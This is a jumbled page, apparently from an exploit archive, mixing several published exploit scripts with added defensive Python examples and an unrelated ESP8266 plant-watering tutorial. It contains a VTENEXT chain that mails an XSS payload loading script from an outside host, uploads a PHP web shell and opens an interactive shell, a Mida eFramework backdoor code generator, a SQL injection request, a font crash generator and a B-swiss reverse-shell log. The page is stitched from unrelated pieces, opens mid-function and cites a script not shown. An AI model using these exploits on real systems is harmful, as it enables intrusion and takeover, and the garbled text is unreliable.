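    """Constant-time comparison of two form strings."""
    return hmac.compare_digest(a.encode("utf-8"), b.encode("utf-8"))


class LoginGate:
    """Server-side state for one login endpoint (assumed name; constructed model)."""

    def __init__(self, username, password):
        self._username = username
        self._password = password
        # session id -> {"captcha": pending answer or None,
        #                "token": next expected Frm_Logintoken,
        #                "attempts": consecutive failed logins}
        self._sessions = {}

    def new_session(self):
        """Start a session; returns the opaque cookie value the client sends back."""
        sid = secrets.token_hex(16)
        self._sessions[sid] = {"captcha": None, "token": 1, "attempts": 0}
        return sid

    def issue_captcha(self, sid):
        """Generate the captcha answer and keep it server-side, bound to the session.
        A real device renders it as an image; the plain answer is returned here only
        so a legitimate client can be simulated."""
        answer = "".join(secrets.choice("abcdefghjkmnpqrstuvwxyz23456789") for _ in range(5))
        self._sessions[sid]["captcha"] = answer
        return answer

    def current_token(self, sid):
        return self._sessions[sid]["token"]

    def login(self, sid, form):
        """Validate one POST of the login form. Returns (ok, reason)."""
        sess = self._sessions.get(sid)
        if sess is None:
            return False, "no session"
        if sess["attempts"] >= MAX_ATTEMPTS:
            return False, "locked"
        sess["attempts"] += 1

        # Anti-replay counter: must match exactly, advances after every accepted form.
        if form.get("Frm_Logintoken", "") != str(sess["token"]):
            return False, "bad token"
        sess["token"] += 1

        # The captcha is checked *here*, not by a separate client-side round trip,
        # and is cleared once looked at so the same answer cannot be reused.
        expected, sess["captcha"] = sess["captcha"], None
        if expected is None or not _eq(expected, form.get("Validatecode", "")):
            return False, "bad captcha"

        if _eq(form.get("Username", ""), self._username) and _eq(form.get("Password", ""), self._password):
            sess["attempts"] = 0
            return True, "ok"
        return False, "bad credentials"


if __name__ == "__main__":
    gate = LoginGate("admin", "admin")
    sid = gate.new_session()
    # A form that skips the captcha step (Validatecode=literally_anything) is refused.
    print(gate.login(sid, {"Frm_Logintoken": "1", "Username": "admin",
                           "Password": "admin", "Validatecode": "literally_anything"}))
    answer = gate.issue_captcha(sid)
    print(gate.login(sid, {"Frm_Logintoken": str(gate.current_token(sid)),
                           "Username": "admin", "Password": "admin", "Validatecode": answer}))
```

The design point is that nothing the client can omit or replay changes the outcome: the only path to "ok" is a fresh captcha answer, the exact expected token and the right credentials, all judged in one handler.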
            
#!/usr/bin/env python3
# Exploit Title: Gnome Fonts Viewer 3.34.0 Heap Corruption
# Date: 2020-09-10
# Exploit Author: Cody Winkler
# Vendor Homepage: gnome.org
# Software Link: https://help.gnome.org/misc/release-notes/3.6/users-font-viewer.html
# Version: 3.34.0
# Tested On: Ubuntu 20.04.1 LTS
#
# Note: May take a few tries. Too many consecutive runs can freeze OS.
# This will trigger an infinite malloc() loop until gnome-font-viewer process is stopped.

from os import system

this_pattern = "BEEF"*21125 # needs to be filled to len ~84500

# TTF file header (probably has some junk data in it) taken from MesloLGS NF Regular.ttf

ttf_header = ("\x00\x01\x00\x00\x00\x13\x01\x00\x00\x04\x00\x30\x46\x46\x54"
"\x4d\x75\xfe\x73\xdd\x00\x13\xb6\x0c\x00\x00\x00\x1c\x47\x44\x45"
"\x46\x4d\x76\x5d\xda\x00\x13\xb0\xac\x00\x00\x04\xaa\x47\x50\x4f"
"\x53\x44\x76\x4c\x75\x00\x13\xb5\xec\x00\x00\x00\x20\x47\x53\x55"
"\x42\x09\xf6\x0b\xdc\x00\x13\xb5\x58\x00\x00\x00\x92\x4f\x53\x2f"
"\x32\x8d\xbd\x8e\x75\x00\x00\x01\xb8\x00\x00\x00\x60\x50\x66\x45"
"\x64\x5b\xd3\xe9\x6b\x00\x13\xb6\x28\x00\x00\x02\x50\x63\x6d\x61"
"\x70\xbf\x0d\x76\x7c\x00\x00\x34\x30\x00\x00\x0a\x36\x63\x76\x74"
"\x20\x28\xfd\x02\x16\x00\x00\x48\x98\x00\x00\x00\x38\x66\x70\x67"
"\x6d\x31\xfc\xa0\x95\x00\x00\x3e\x68\x00\x00\x09\x96\x67\x61\x73"
"\x70\xff\xff\x00\x10\x00\x13\xb0\xa4\x00\x00\x00\x08\x67\x6c\x79"
"\x66\xd6\x2f\x24\x7c\x00\x00\xac\xf0\x00\x11\xd8\x34\x68\x65\x61"
"\x64\x04\xe3\x81\x66\x00\x00\x01\x3c\x00\x00\x00\x36\x68\x68\x65"
"\x61\x0a\xf4\x01\xa2\x00\x00\x01\x74\x00\x00\x00\x24\x68\x6d\x74"
"\x78\x93\xdf\x7e\x92\x00\x00\x02\x18\x00\x00\x32\x16\x6c\x6f\x63"
"\x61\xe6\x44\x45\x24\x00\x00\x48\xd0\x00\x00\x64\x20\x6d\x61\x78"
"\x70\x1a\xa2\x0b\x9c\x00\x00\x01\x98\x00\x00\x00\x20\x6e\x61\x6d"
"\x65\x62\x13\x17\xa4\x00\x12\x85\x24\x00\x00\x0b\x9d\x70\x6f\x73"
"\x74\xbb\xe8\x29\xcf\x00\x12\x90\xc4\x00\x01\x1f\xdd\x70\x72\x65"
"\x70\xb4\xc5\xc5\x72\x00\x00\x48\x00\x00\x00\x00\x95\x00\x01\x00"
"\x00\x00\x02\x07\x2b\xd0\x81\xfc\x0f\x5f\x0f\x3c\xf5\x02\x9f\x08"
"\x00\x00\x00\x00\x00\xc5\x74\x19\x33\x00\x00\x00\x00\xda\x9d\x14"
"\xf1\xfd\x41\xfc\xfc\x05\xdf\x0a")

print('[+] Generating crash.ttf with DEADDEAD')

with open("./crash.ttf", 'w') as f:
    f.write(ttf_header)
    f.write(this_pattern)
print('[+] Done')

print('[+] Triggering out-of-bounds write in gnome-font-viewer')
system("/usr/bin/gnome-font-viewer ./crash.ttf")
            
#!/usr/bin/python3

# Exploit Title: VTENEXT 19 CE - Remote Code Execution
# Google Dork: n/a
# Date: 2020/09/09
# Exploit Author: Marco Ruela
# Vendor Homepage: https://www.vtenext.com/en/
# Software Link: Vendor removed vulnerable version from sourceforge.net
# Version: 19 CE
# Tested on: Ubuntu 16.04
# CVE 	: N/A
	
# 2020/03/07 - Disclosed vulnerabilities to vendor
# 2020/03/10 - Vendor committed to fix
# 2020/09/09 - Public disclosure

# This script should be easy enough to follow.
# We string together the three vulnerabilities to get RCE.

# XSS - The "From" field of the VTENEXT Messages module is vulnerable.
# File Upload - File extensions are checked against $upload_badext in the config file; .pht extensions are allowed and executable by default.
# CSRF - No CSRF protections are in place.

# exploit.js needs to be hosted somewhere; the IPs need to be replaced.
# check_csrf() should be changed based on your setup.
# run_shell() is a "nice to have".


# content of exploit.js
"""
function insertImage() {
	var xhr = new XMLHttpRequest();
	xhr.open('POST','http://192.168.226.168/vtenext19ce/index.php?module=Myfiles&action=MyfilesAjax&file=UploadFile&folderid=&uniqueid=',true);
	xhr.setRequestHeader('Content-type','multipart/form-data; boundary=---------------------------rekt');
    xhr.setRequestHeader('Content-Length', '248');
    xhr.setRequestHeader('Referer', 'http://172.16.233.146/vtenext19ce/index.php');
    xhr.withCredentials = true;
    var body = '-----------------------------rekt\nContent-Disposition: form-data; name="file_0"; filename="shell.pht"\nContent-Type: text/text\n\n<?php system($_GET[\'x\']); ?>\n\n-----------------------------rekt--';
    
    var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
}

insertImage();
"""

import smtplib
import datetime
import requests
import os
import time

base_url = "http://192.168.226.168/vtenext19ce/"

print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC")


def build_url():
    d = datetime.datetime.today()
    year = str(d.year)
    month = str(d.strftime("%B"))
    week = "week" + str(d.isocalendar()[1] - d.replace(day=1).isocalendar()[1])
    tmp = base_url + "storage/home/1/" + year + "/" + month + "/" + week + "/"
    return(tmp)

def build_mail():
    _from    = """'<script src="http://192.168.226.1/exploit.js" onerror=alert(1) >'"""
    _to      = "admin@example.com"
    _subject = "Important!"
    _body    = "While you're reading this, a file is being uploaded to this server." 

    msg  = "From: " + _from + "\n"
    msg += "To: " + _to + "\n"
    msg += "Subject: " + _subject + "\n\n"
    msg += _body
    return msg

def send_mail():
    msg = build_mail()
    smtp_server = '192.168.226.167'
    smtp_port   = 25

    sender   = 'user1@lab.local'
    receiver = 'admin@lab.local'

    server = smtplib.SMTP(smtp_server, smtp_port)
    server.sendmail(sender, receiver, msg)

def check_csrf():
    while True:
        is_there = os.popen('tail -n1 /var/log/apache2/access.log').read()

        if "200" in is_there and "/exploit.js" in is_there and base_url in is_there:
            print("[>] CSRF triggered")
            break
        else:
            time.sleep(0.5)
            continue


def find_shell():
    print("[>] Locating shell")
    time.sleep(1)
    tmp1 = build_url()
    for i in range(1, 9999):
        url = tmp1 + str(i) + "_shell.pht" 
        r = requests.get(url)
        if r.status_code == 200:
            print("[>] Found the shell")
            print("[-] Location: " + url)
            return url
        else:
            continue    

def run_shell(x):
    print("\n")
    while True:
        cmd = input("shell> ")
        if cmd == "exit":
            break
        else:
            url = x + "?x=" + cmd
            r = requests.get(url)
            print(r.text)


print("[>] Sending email")
send_mail()

print("[-] Waiting for user to open mail")

check_csrf()

shell_location = find_shell()

run_shell(shell_location)


print("[!] Done!")
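Both the CuteNews script above and this VTENEXT chain rely on the same server-side weakness: the upload handler decides from a client-chosen filename plus, at best, a few leading bytes. The following is an added example, not code from either project, that puts the two weak checks next to a hardened one in Python: an extension allowlist checked against real image signatures, a server-chosen storage name, and rejection of double extensions. The blocklist contents, the function names and the sample uploads are constructed; the first two payload bodies are the ones shown in the scripts above.

```python
import os

# Constructed sample uploads: the two payload bodies from the scripts above
# and a minimal, valid 1x1 GIF89a for the legitimate case.
CUTENEWS_PAYLOAD = b"GIF8;\n<?php system($_REQUEST['cmd']) ?>"
VTENEXT_PAYLOAD = b"<?php system($_GET['x']); ?>"
REAL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
            b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")

# Blocklist in the spirit of VTENEXT's $upload_badext (contents assumed). It is
# the wrong tool: every executable extension the list forgets (.pht here,
# also .phtml, .phar, ...) passes straight through.
UPLOAD_BADEXT = {"php", "php3", "php4", "php5", "phps", "exe", "sh"}

# Allowlist of image types with their real file signatures.
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}


def vulnerable_avatar_check(filename, content):
    """The weak check the CuteNews script exploits: a 'GIF8' prefix is taken as
    proof of an image and the client-supplied filename is kept as-is."""
    return content.startswith(b"GIF8")


def vulnerable_badext_check(filename):
    """Extension blocklist of the VTENEXT kind: anything not listed passes."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in UPLOAD_BADEXT


def hardened_upload_check(filename, content, user_id):
    """Return the server-chosen storage name on success, or None on rejection."""
    base = os.path.basename(filename)
    # 1. exactly one extension, and it must be on the allowlist
    if base.count(".") != 1:
        return None
    ext = base.rsplit(".", 1)[1].lower()
    ext = "jpg" if ext == "jpeg" else ext
    if ext not in MAGIC:
        return None
    # 2. the bytes must carry the genuine signature of the claimed type
    if not content.startswith(MAGIC[ext]):
        return None
    # 3. cheap extra guard: an image container has no business holding a PHP
    #    open tag (production code should re-encode the image instead)
    if b"<?" in content:
        return None
    # 4. the stored name comes from the server's identity for the user, never
    #    from the client's filename, and keeps only the validated extension
    return f"avatar_{user_id}.{ext}"


if __name__ == "__main__":
    print("cutenews payload, weak check :", vulnerable_avatar_check("attacker.php", CUTENEWS_PAYLOAD))
    print("shell.pht, blocklist check   :", vulnerable_badext_check("shell.pht"))
    print("cutenews payload, hardened   :", hardened_upload_check("attacker.php", CUTENEWS_PAYLOAD, 7))
    print("real gif, hardened           :", hardened_upload_check("me.GIF", REAL_GIF, 7))
```

Note that the hardened check keeps the upload directory's content type under the server's control even when the web server would execute `.php`/`.pht` files there; pairing it with a directory-level "no script execution" rule (for example disabling the PHP handler for the uploads path) is the second half of the fix.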
            
# Exploit Title: ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path
# Discovery by: Burhanettin Özgenç
# Discovery Date: 2020-09-15
# Vendor Homepage: https://www.forensit.com/downloads.html
# Tested Version: 2.2.0.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64

# Step to discover Unquoted Service Path: 

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ForensiTAppxService" | findstr /i /v """

ForensiT AppX Management Service	ForensiTAppxService	C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe	Auto

# Service info:

C:\>sc qc ForensiTAppxService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ForensiTAppxService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ForensiT AppX Management Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit:
# A successful attempt would require the local user to be able to insert their code in the system 
# root path undetected by the OS or other security applications where it could potentially be executed
# during application startup or reboot. If successful, the local user's code would execute with 
# the elevated privileges of the application.
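For both unquoted service path advisories on this page (Input Director above and ForensiT here), the condition is mechanical enough to check automatically. The following is an added example, not from either advisory, that parses the tab-separated `wmic service get` rows and a `sc qc` block in Python, lists the intermediate executables Windows would resolve before the real image (the locations a defender should verify are not writable by standard users), and produces the quoted `binPath=` value that removes the ambiguity. The sample rows are constructed from the output shown on this page plus one quoted service for contrast; function names are assumptions.

```python
import re

# Constructed from the rows printed above (tab-separated, as wmic emits them),
# plus one correctly quoted service for contrast.
WMIC_OUTPUT = (
    "ForensiT AppX Management Service\tForensiTAppxService\t"
    "C:\\Program Files (x86)\\ForensiT\\AppX Management Service\\ForensiTAppxService.exe\tAuto\n"
    "Input Director Service\tInputDirector\t"
    "C:\\Program Files (x86)\\InputDirector\\IDWinService.exe\tAuto\n"
    "Quoted Example\tQuotedSvc\t\"C:\\Program Files\\Vendor\\svc.exe\" -run\tAuto\n"
)

SC_QC_OUTPUT = (
    "SERVICE_NAME: ForensiTAppxService\n"
    "        TYPE               : 10  WIN32_OWN_PROCESS\n"
    "        START_TYPE         : 2   AUTO_START\n"
    "        BINARY_PATH_NAME   : C:\\Program Files (x86)\\ForensiT\\AppX Management Service\\ForensiTAppxService.exe\n"
    "        SERVICE_START_NAME : LocalSystem\n"
)

EXE_RE = re.compile(r"^(.*?\.exe)", re.IGNORECASE)


def image_path(pathname):
    """Split an unquoted BINARY_PATH_NAME into (image, args). Returns None when
    the path is quoted (not affected) or has no .exe to anchor on."""
    p = pathname.strip()
    if p.startswith('"'):
        return None
    m = EXE_RE.match(p)
    if not m:
        return None
    return m.group(1), p[m.end():].strip()


def search_candidates(image):
    """Executables the service controller would try before the real image:
    the path cut at each space, with .exe appended (C:\\Program.exe, ...)."""
    return [image[:i] + ".exe" for i, ch in enumerate(image) if ch == " "]


def quoted_binpath(image, args=""):
    """The binPath= value that makes the image path unambiguous."""
    return f'"{image}"' + (f" {args}" if args else "")


def _finding(service, pathname):
    parsed = image_path(pathname)
    if not parsed or " " not in parsed[0]:
        return None  # quoted, or unquoted but without spaces: not affected
    image, args = parsed
    return {"service": service, "image": image,
            "candidates": search_candidates(image),
            "fix": quoted_binpath(image, args)}


def check_wmic(output):
    """Findings for each row of `wmic service get name,displayname,pathname,startmode`
    (wmic orders the columns DisplayName, Name, PathName, StartMode)."""
    findings = []
    for line in output.splitlines():
        if not line.strip():
            continue
        _display, name, pathname, _start = line.split("\t")
        f = _finding(name, pathname)
        if f:
            findings.append(f)
    return findings


def check_sc_qc(output):
    """The same check against one `sc qc <service>` block."""
    name = re.search(r"SERVICE_NAME:\s*(\S+)", output)
    path = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", output)
    if not (name and path):
        return None
    return _finding(name.group(1), path.group(1))


if __name__ == "__main__":
    for f in check_wmic(WMIC_OUTPUT):
        print(f["service"], "would first resolve:", f["candidates"])
        # Escaped form for the fix: sc config <svc> binPath= "\"C:\...\x.exe\""
        print("  sc config", f["service"], 'binPath= "' + f["fix"].replace('"', '\\"') + '"')
```

The candidate list is what to audit: if any of those directories (typically `C:\` and the vendor folder) grants standard users write access, the finding is exploitable; otherwise it is a hygiene issue that the printed `sc config` line still fixes.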
            
# Exploit Title: Mida eFramework 2.9.0 - Back Door Access
# Google Dork: Server: Mida eFramework
# Date: 2020-08-27
# Exploit Author: elbae
# Vendor Homepage: https://www.midasolutions.com/
# Software Link: http://ova-efw.midasolutions.com/
# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
# Version: <= 2.9.0
# CVE : CVE-2020-15921


#! /usr/bin/python3
# -*- coding: utf-8 -*-

from datetime import date

def print_disclaimer():
    print("""
---------------------
Disclaimer:
1) For testing purpose only.
2) Do not attack production environments.
3) Intended for educational purposes only and cannot be used for law
violation or personal gain.
4) The author is not responsible for any possible harm caused by this
material.
---------------------""")

def print_info():
    print("""
[*] Mida Solutions eFramework PDC Administrative Back-Door access
(CVE-2020-15921)
[*] Reference:
https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
[*] This script can be used to retrieve the code which gives you the
possibility to change the password.
[*] How it works:
1) run the script
2) copy the output to the URL you want to access (i.e.
http://192.168.1.60:8090/PDC/extreq.php?code=THE-CODE)
3) change the password
4) access as admin with the password """)

def main():
    print_info()
    print_disclaimer()
    abc = ['a', 'b', 'c', 'd', 'e', 'f', 'g',
           'h', 'i', 'j', 'k', 'l', 'm', 'n',
           'o', 'p', 'q', 'r', 's', 't', 'u',
           'v', 'w', 'x', 'y', 'z']
    baseString = 'midasoluti'  # default value from source code
    today = date.today()
    dateString = "{}0{:02d}0{}".format(today.day, today.month, today.year)
    retString = ""

    # Each letter of baseString is shifted by the digit of dateString at the
    # same position; a shift past 'z' falls back to the digit itself.
    for i in range(0, len(baseString)):
        n = int(abc.index(baseString[i]))
        m = int(dateString[i])
        s = n + m
        if (s >= len(abc)):
            s = m
        retString += abc[s]
    print("[+] Generated code: {}".format(retString))
    print("[?] Example URL: http://target:8090/PDC/extreq.php?code={0}".format(retString))
    print("[?] Example URL: https://target/PDC/extreq.php?code={0}".format(retString))

if __name__ == '__main__':
    main()
            
# Exploit Title: Seat Reservation System 1.0 - 'id' SQL Injection
# Date: 2020-09-20
# Exploit Author: Augkim
# Vendor Homepage: https://www.sourcecodester.com/php/14452/seat-reservation-system-movie-theater-project-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip
# Tested on: Apache2


POST /URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8-- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/sere/
Connection: close
Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Origin: foo.example.org


PoC:
/URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8--
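The payload only works because the id parameter is concatenated into the SQL without quotes (the leading '' is an empty string literal that keeps `id=` syntactically valid) and because the query behind page=reserve returns eight columns. The following added example, which is not code from the project, rebuilds that situation on an in-memory SQLite table to show the payload landing, how an attacker arrives at the number 8, and the parameterized fix. The table, its column names and the use of SQLite's sqlite_version() in place of MySQL's version() are assumptions.

```python
import sqlite3

# Constructed stand-in for the reservation app's table. The real schema is not
# on the page; eight columns are assumed because the PoC's UNION selects eight values.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE schedules (id INTEGER, title TEXT, c3 TEXT, c4 TEXT,"
                 " c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT)")
    conn.execute("INSERT INTO schedules VALUES (1, 'Movie A', '', '', '', '', '', '')")
    return conn


def reserve_vulnerable(conn, raw_id):
    """Numeric id concatenated into the query without quotes, which is what the
    PoC's leading '' tells us about the real query."""
    return conn.execute("SELECT * FROM schedules WHERE id=" + raw_id).fetchall()


def reserve_parameterized(conn, raw_id):
    """Fix: coerce to int, then bind as a parameter; injected SQL never reaches
    the parser, and non-numeric input is simply rejected."""
    try:
        id_value = int(raw_id)
    except (TypeError, ValueError):
        return []
    return conn.execute("SELECT * FROM schedules WHERE id=?", (id_value,)).fetchall()


def union_column_count(conn, max_cols=20):
    """How the 8 in the PoC is found: UNION with n NULLs until the database stops
    complaining that the two SELECTs have different column counts."""
    for n in range(1, max_cols + 1):
        probe = "''union select " + ",".join(["null"] * n) + "--"
        try:
            reserve_vulnerable(conn, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None


# The PoC's payload with SQLite's version function in place of MySQL's version()
PAYLOAD = "''union select 1,sqlite_version(),3,4,5,6,7,8--"

if __name__ == "__main__":
    db = build_db()
    print("column count:", union_column_count(db))
    print("vulnerable  :", reserve_vulnerable(db, PAYLOAD))
    print("parameterized:", reserve_parameterized(db, PAYLOAD))
```

One caveat when transferring the probe to MySQL: MySQL's `--` comment needs a following space, and the PoC omits it; it still works there because the quoted query ends in `8--'`, which MySQL parses as `8 - -''`, i.e. 8 minus zero.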
            

To enrich our retirement life a little, this article introduces how to build an intelligent plant-watering system with an ESP8266.

Implementation of functions

Read the current air temperature, air humidity and soil moisture from a mobile phone. When soil moisture drops below 50%, the relay switches on automatically and a pump waters the plant; when soil moisture exceeds 50%, the relay is switched off.

Required Equipment

ESP8266 development board, relay module, DHT11 temperature/humidity sensor, soil moisture sensor

Line connection

Equipment      VCC (+)   GND (-)   Signal line
Relay          3V        GND       D4
DHT11          3V        GND       D2
Soil sensor    3V        GND       D0

(The sketch below reads the soil sensor on the analog input A0; if you use the analog reading, the sensor's analog output goes to A0.)

Code

#define BLINKER_WIFI
#define BLINKER_MIOT_SENSOR          // Expose the device to Xiao Ai (Xiaomi's voice assistant)
#define soilPin A0                   // Soil sensor analog output, read on A0
#define CS 2                         // Relay control pin: GPIO2 (D4)

#include <Blinker.h>
#include <DHT.h>                     // DHT11 sensor library

#define DHTPIN 4                     // DHT11 data pin: GPIO4 (D2)
#define DHTTYPE DHT11                // DHT11 module; other DHT types can be substituted

int soilValue;                       // Raw soil reading (0-1023)
int soilMoisture;                    // Soil moisture in percent

char auth[] = "1c2ce3eef946";        // Blinker app device key (replace with your own)
char ssid[] = "PDCN";                // WiFi network name
char pswd[] = "1234567890";          // WiFi password (keep real credentials out of shared source)

BlinkerNumber HUMI("humi");          // Humidity data key
BlinkerNumber TEMP("temp");          // Temperature data key
BlinkerNumber TEMP2("temp2");        // Soil moisture data key

DHT dht(DHTPIN, DHTTYPE);

float humi_read = 0, temp_read = 0;  // Last good readings

// Dashboard components
void heartbeat()
{
    HUMI.print(humi_read);           // Send humidity to the Blinker app
    TEMP.print(temp_read);           // Send temperature to the Blinker app
    TEMP2.print(soilMoisture);

    if (soilMoisture < 50)           // Soil moisture below 50%: run the pump
    {
        digitalWrite(CS, LOW);       // Energise the relay (an active-low relay module is
                                     // assumed; this line was garbled in the original)
    }
    else
    {
        digitalWrite(CS, HIGH);      // Release the relay
    }
}

// Real-time chart component
void dataStorage()
{
    Blinker.dataStorage("temp", temp_read);
    Blinker.dataStorage("humi", humi_read);
    Blinker.dataStorage("humi2", soilMoisture);
}

// Answer queries from Xiao Ai
void miotQuery(int32_t queryCode)
{
    BLINKER_LOG("MIOT Query codes: ", queryCode);
    int humi_read_int = humi_read;   // Xiao Ai expects an integer humidity
    BlinkerMIOT.humi(humi_read_int);
    BlinkerMIOT.temp(temp_read);
    BlinkerMIOT.print();
}

void setup()
{
    Serial.begin(9600);              // Serial debug output at 9600 baud
    BLINKER_DEBUG.stream(Serial);
    BLINKER_DEBUG.debugAll();

    Blinker.begin(auth, ssid, pswd); // WiFi and Blinker initialisation
    Blinker.attachHeartbeat(heartbeat);      // Register the dashboard callback
    dht.begin();
    BlinkerMIOT.attachQuery(miotQuery);      // Register the Xiao Ai callback
    Blinker.attachDataStorage(dataStorage);  // Register the chart callback

    pinMode(LED_BUILTIN, OUTPUT);
    digitalWrite(LED_BUILTIN, 1);
    pinMode(CS, OUTPUT);             // Relay pin as output, relay off at boot
    digitalWrite(CS, HIGH);
}

void loop()
{
    Blinker.run();                   // Parses data received from Blinker; must run on every loop

    float h = dht.readHumidity();    // Humidity from the DHT11
    float t = dht.readTemperature(); // Temperature from the DHT11
    if (isnan(h) || isnan(t))        // Reject failed reads
    {
        BLINKER_LOG("Reading sensor data failed");
    }
    else
    {
        BLINKER_LOG("Humidity: ", h, " %");
        BLINKER_LOG("Temperature: ", t, " *C");
        humi_read = h;
        temp_read = t;
    }

    soilValue = analogRead(soilPin);                 // Raw value 0-1023; about 1023 in dry air
    soilMoisture = map(soilValue, 0, 1023, 100, 0);  // Convert to 100% (wet) .. 0% (dry)

    Blinker.delay(200);              // Keeps the connection and data handling alive while waiting
}

Effect

When soil moisture is below 50%, the relay switches on automatically.

When soil moisture is above 50%, the relay switches off.

Of course, the code above only implements the functions described and may have shortcomings; adapt it to your own situation as needed.

# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution
# Date: 2020-08-27
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.b-swiss.com
# Version: <= 3.6.5
# CVE : N/A


#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution
#
#
# Vendor: B-Swiss SARL | b-tween Sarl
# Product web page: https://www.b-swiss.com
# Affected version: 3.6.5
#                   3.6.2
#                   3.6.1
#                   3.6.0
#                   3.5.80
#                   3.5.40
#                   3.5.20
#                   3.5.00
#                   3.2.00
#                   3.1.00
#
# Summary: Intelligent digital signage made easy. To go beyond the
# possibilities offered, b-swiss allows you to create the communication
# solution for your specific needs and your graphic charter. You benefit
# from our experience and know-how in the realization of your digital
# signage project.
#
# Desc: The application suffers from an "authenticated" arbitrary
# PHP code execution. The vulnerability is caused due to the improper
# verification of uploaded files in 'index.php' script thru the 'rec_poza'
# POST parameter. This can be exploited to execute arbitrary PHP code
# by uploading a malicious PHP script file that will be stored in
# '/usr/users' directory. Due to an undocumented and hidden "maintenance"
# account 'admin_m' which has the highest privileges in the application,
# an attacker can use these hard-coded credentials to authenticate and
# use the vulnerable image upload functionality to execute code on the
# server.
#
# ========================================================================================
# lqwrm@metalgear:~/prive$ python3 sign2.py 192.168.10.11 192.168.10.22 7777
# [*] Checking target...
# [*] Good to go!
# [*] Checking for previous attempts...
# [*] All good.
# [*] Getting backdoor session...
# [*] Got master backdoor cookie: 0c1617103c6f50107d09cb94b3eafeb2
# [*] Starting callback listener child thread
# [*] Starting handler on port 7777
# [*] Adding GUI credentials: test:123456
# [*] Executing and deleting stager file
# [*] Connection from 192.168.10.11:40080
# [*] You got shell!
# id ; uname -or
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# 4.15.0-20-generic GNU/Linux
# exit
# *** Connection closed by remote host ***
# [?] Want me to remove the GUI credentials? y
# [*] Removing...
# [*] t00t!
# lqwrm@metalgear:~/prive$ 
# ========================================================================================
#
# Tested on: Linux 5.3.0-46-generic x86_64
#            Linux 4.15.0-20-generic x86_64
#            Linux 4.9.78-xxxx-std-ipv6-64
#            Linux 4.7.0-040700-generic x86_64
#            Linux 4.2.0-27-generic x86_64
#            Linux 3.19.0-47-generic x86_64
#            Linux 2.6.32-5-amd64 x86_64
#            Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
#            macOS 10.13.5
#            Microsoft Windows 7 Business Edition SP1 i586
#            Apache/2.4.29 (Ubuntu)
#            Apache/2.4.18 (Ubuntu)
#            Apache/2.4.7 (Ubuntu)
#            Apache/2.2.22 (Win64)
#            Apache/2.4.18 (Ubuntu)
#            Apache/2.2.16 (Debian)
#            PHP/7.2.24-0ubuntu0.18.04.6
#            PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
#            PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
#            PHP/5.6.31
#            PHP/5.6.30-10+deb.sury.org~xenial+2
#            PHP/5.5.9-1ubuntu4.17
#            PHP/5.5.9-1ubuntu4.14
#            PHP/5.3.10
#            PHP/5.3.13
#            PHP/5.3.3-7+squeeze16
#            PHP/5.3.3-7+squeeze17
#            MySQL/5.5.49
#            MySQL/5.5.47
#            MySQL/5.5.40
#            MySQL/5.5.30
#            MySQL/5.1.66
#            MySQL/5.1.49
#            MySQL/5.0.77
#            MySQL/5.0.12-dev
#            MySQL/5.0.11-dev
#            MySQL/5.0.8-dev
#            phpMyAdmin/3.5.7
#            phpMyAdmin/3.4.10.1deb1
#            phpMyAdmin/3.4.7
#            phpMyAdmin/3.3.7deb7
#            WampServer 3.2.0
#            Acore Framework 2.0
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2020-5590
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5590.php
#
#
# 13.06.2020
#

from http.cookiejar import DefaultCookiePolicy# #yciloPeikooCtluafeD tropmi rajeikooc.ptth mofr
from http.cookiejar import CookieJar#         oOo         #raJeikooC tropmi rajeikooc.ptth mofr
